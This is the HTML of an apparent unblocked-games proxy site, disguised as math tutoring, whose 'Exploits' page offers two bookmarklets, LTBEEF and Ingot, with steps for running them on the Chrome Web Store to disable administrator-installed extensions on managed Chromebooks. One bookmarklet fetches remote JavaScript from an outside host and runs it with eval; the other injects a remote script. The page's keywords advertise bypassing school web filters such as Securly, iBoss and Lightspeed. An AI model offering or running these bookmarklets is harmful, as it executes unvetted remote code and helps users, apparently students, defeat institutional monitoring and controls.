<!DOCTYPE html>
<html lang="en">
<head>
   <meta name="description" content="The best math tutoring!" />
<meta name="keywords" content="Interstellar Official, Unblock Games, Interstellar, Interstellar V3, 1v1.LOL, Run 3, Gameboy Advanced Games, DS Games, proxy, web proxy, service workers, unblock websites, unblock chromebook, free web proxy, proxy list, proxy sites, un block chromebook, online proxy, proxy server, proxysite, proxy youtube, bypass securly, bypass iboss, bypass lightspeed filter, holy unblocker, chromebooks, titanium network, unblock youtube, youtube proxy, unblocked youtube, youtube unblocked, interstellar, chromebook,unblocked,unblocked games,html games,html5 games,flash games,flashplayer games,proxy,io">
        <meta name="author" content="Bubbo" />
    <title>Exploits - Interstellar</title>
  <link rel="icon" type="image/x-icon" href="/media/favicon/favicon.ico">
    <link rel="stylesheet" href="/css/games.css">
	<link rel="stylesheet" href="/css/galaxy.css" />
    <link rel="stylesheet" href="/css/index.css" />

    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6840529569014734"
     crossorigin="anonymous"></script>
  
     <script async src="https://arc.io/widget.min.js#gcM6sndx"></script>
          
</head>



    <!--NAVBAR-->
    <style>
      * {
        padding: 0;
        margin: 0;
      }
      
      body {
        font-family: Arial, Tahoma, Serif;
        color: #fff;
      }
      
      nav {
        display: flex;
        justify-content:space-between; 
        align-items: center;
        padding: 1rem 2rem;
        background: #000; 
      }
      
      nav ul {
        display: flex;
        list-style: none; 
      }
      
      nav li {
        padding-left: 1rem; 
      }
      
      nav a {
        text-decoration: none;
        color: #fff
      }
      
       /* 
        Extra small devices (phones, 600px and down) 
      */
      @media only screen and (max-width: 600px) {
        nav {
          flex-direction: column;
              text-align: center;
      
        }
        nav ul {
          flex-direction: column;
          padding-top: 0.5rem;
        }
        nav li {
          padding: 0.5rem 0;
        }
      }
      </style>
      
      
      <nav>
        <h2>Interstellar</h2>
        <ul>
            
            <li><a href="/./">Home</a></li>
          <li><a href="/play.html">Games</a></li>
          <li><a href="/apps.html">Apps</a></li>
      <li><a href="/widgetbot.html">Chatroom</a></li>
        </ul>
      </nav>

<body>
    <br>
    <br>
    <br>
  
    <div style="text-align: center;">
      <br><a href="javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});" style="display: block; cursor: pointer; background: #fff; font-size: 18px; sans-serif; color: #000; text-align: center; width: calc(17px) rem; padding: 10px; border-radius: 30px; font-weight: 400; line-height: 1.4rem; box-shadow: 0 2px 0 black; text-decoration: none; width: 8rem; margin-left: auto; margin-right: auto; font-family: Arial;"><strong>LTBEEF</strong></a><br>
      <a style="display: block; cursor: pointer; background: #fff; font-size: 18px; sans-serif; color: #000; text-align: center; width: calc(17px) rem; padding: 10px; border-radius: 30px; font-weight: 400; line-height: 1.4rem; box-shadow: 0 2px 0 lightblue; text-decoration: none; width: 8rem; margin-left: auto; margin-right: auto; font-family: Arial;" href="javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
      "><strong>Ingot</strong></a>
      <br>
     <p>- LTBEEF Created By Bypassi (Bypassi#7037), Ingot Created By Nebelung (Nebelung#1335)<br>
      <br>
        - Drag either of the above buttons to your bookmarks bar<br>
       <br>
        - Visit <a href="https://chrome.google.com/webstore_" style="color:aqua">https://chrome.google.com/webstorex</a>. (This is a 404 page, and that is ok. If it is blocked,  <a href="https://dsc.gg/interstellarnetwork" style="color:purple;">IN Discord Server</a> for support!)<br>
        <br>    
        - Click the bookmark (<strong>NOTE: This only works on the Chrome Web Store.</strong>)<br>
        <br>
        - Switch off the extentions you don't want to have anymore.<br>
        <br>
        You're done! The extention should now be disabled.
      </p>
    </div>
  
  </body>